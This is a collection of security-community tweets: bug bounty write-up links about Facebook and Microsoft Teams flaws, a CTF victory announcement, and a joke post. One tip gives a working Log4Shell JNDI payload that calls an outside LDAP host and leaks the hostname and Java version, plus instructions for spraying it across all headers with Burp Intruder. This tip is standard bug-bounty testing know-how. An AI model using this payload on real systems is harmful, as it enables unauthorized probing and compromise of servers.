Write-up about my last submission in Facebook:
Broken session management leads to bypass 2FA and Permanent access to Facebook user’s https://t.co/rU9hS2QZI1 #bugbounty#facebook#CyberSecurity#bughunting
Microsoft Teams: 1 feature, 4 vulnerabilities
We stumbled upon several vulnerabilities in Team's link preview feature, out of which MS only fixed one so far.
https://t.co/AAd4eKbxnH
trying to test every header of a website for #log4j? Use BurpSuite and the Pitchfork attack in the Intruder and set both payloads to the header values:
${jndi:ldap://${hostName}.§§.${sys:java.version}.cb.io}
now you know the vuln header :)
#bugbounty#bugbountytips
I honestly think @r3billions is one of the best CTF teams in the middle east. This is great! but this is also an opportunity to be one of the best in the world :) Don't miss that opportunity ;)
NEWS JUST IN: R3billions wins first place at #athackcon’s Capture the Flag! 🚩🙌
A huge thank you to all contestants! With teams from Saudi Arabia, the UAE, Poland, the USA and more - this truly has been EPIC.
🚨 BLACK FRIDAY SPECIAL 🚨
Today and today only, you can find all of my free education and content, online FOR FREE! After today's sale, everything will return to normal asking price: $0.00! 😱